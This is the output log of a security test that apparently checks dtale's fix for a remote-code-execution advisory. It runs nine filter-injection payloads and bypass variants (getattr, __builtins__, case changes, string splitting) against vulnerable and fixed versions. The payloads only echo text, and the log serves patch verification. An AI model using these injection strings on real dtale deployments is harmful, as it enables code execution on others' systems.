============================================================
Testing: Vulnerable (< 3.20.0)
Path: /root/.pruva/runs/ghsa-c87c-78rc-vmv2_20260220-154228/dtale_repo
============================================================
[INFO] Security validation features are ABSENT: cannot import name 'ColumnFilterSecurity' from 'dtale.column_filters' (/root/.pruva/runs/ghsa-c87c-78rc-vmv2_20260220-154228/dtale_repo/dtale/column_filters.py)

[TEST 1] OutlierFilter with direct RCE payload
  [VULNERABLE] OutlierFilter accepted raw malicious query!

[TEST 2] StringFilter with code injection in value
  [VULNERABLE] Malicious code in query: `name` == "__import__('os').system('echo RCE')"

[TEST 3] Bypass attempt: Case variations
  [BYPASS] Case variation accepted!

[TEST 4] Bypass attempt: String splitting across parameters
  [BYPASS] String split accepted: 0 <= `name`.str.len() <= 1) or __import__('os').system('echo RCE') or (1==1

[TEST 5] Bypass attempt: getattr indirect access
  [BYPASS] getattr accepted: `name` == "getattr(__builtins__, '__import__')('os').system('echo RCE')"

[TEST 6] Bypass attempt: __builtins__ access
  [BYPASS] __builtins__ accepted: `name` == "__builtins__.__import__('os').system('echo RCE')"

[TEST 7] run_query validation test
  [ERROR] run_query: "__import__" is not a supported function

[TEST 8] NumericFilter with code injection attempt
  [VULNERABLE] NumericFilter accepted malicious value!

[TEST 9] DateFilter with code injection attempt
  [VULNERABLE] DateFilter accepted malicious value!

============================================================
Results for Vulnerable (< 3.20.0):
============================================================
Vulnerable: 4
Bypass found: 4
Blocked: 0
Errors: 1

[CRITICAL] BYPASS FOUND! 4 bypass(es) work against Vulnerable (< 3.20.0)

============================================================
Testing: Fixed (3.20.0+)
Path: /root/.pruva/runs/ghsa-c87c-78rc-vmv2_20260220-154228/vuln_variant/dtale_fixed
============================================================
[INFO] Security validation features are PRESENT

[TEST 1] OutlierFilter with direct RCE payload
  [BLOCKED] Input validation rejected: Outlier filter query contains potentially unsafe content: "__import__('os').system('echo RCE')"

[TEST 2] StringFilter with code injection in value
  [BLOCKED] Input validation rejected: Filter value contains potentially unsafe content: "__import__('os').system('echo RCE')"

[TEST 3] Bypass attempt: Case variations
  [BLOCKED] Case variation rejected: Filter value contains potentially unsafe content: "__IMPORT__('OS').SYSTEM('ECHO RCE')"

[TEST 4] Bypass attempt: String splitting across parameters
  [BLOCKED] String split rejected: Filter value contains potentially unsafe content: "0,1) or __import__('os').system('echo RCE') or (1==1"

[TEST 5] Bypass attempt: getattr indirect access
  [BLOCKED] getattr rejected: Filter value contains potentially unsafe content: "getattr(__builtins__, '__import__')('os').system('echo RCE')"

[TEST 6] Bypass attempt: __builtins__ access
  [BLOCKED] __builtins__ rejected: Filter value contains potentially unsafe content: "__builtins__.__import__('os').system('echo RCE')"

[TEST 7] run_query validation test
  [BLOCKED] run_query rejected: Query contains potentially unsafe content and has been blocked: "`age` > 0 and __import__('os').system('echo RCE')"

[TEST 8] NumericFilter with code injection attempt
  [BLOCKED] NumericFilter rejected: Expected numeric value, got: "__import__('os').system('echo RCE')"

[TEST 9] DateFilter with code injection attempt
  [BLOCKED] DateFilter rejected: Date filter value contains invalid characters: "2024-01-01') or __import__('os').system('echo RCE') or ('1"

============================================================
Results for Fixed (3.20.0+):
============================================================
Vulnerable: 0
Bypass found: 0
Blocked: 9
Errors: 0

[SECURE] No vulnerabilities or bypasses found in Fixed (3.20.0+)

============================================================
FINAL SUMMARY
============================================================
[RESULT] No bypass found - The fix appears complete for tested vectors.
[RESULT] The vulnerable version is exploitable; fixed version blocks attacks.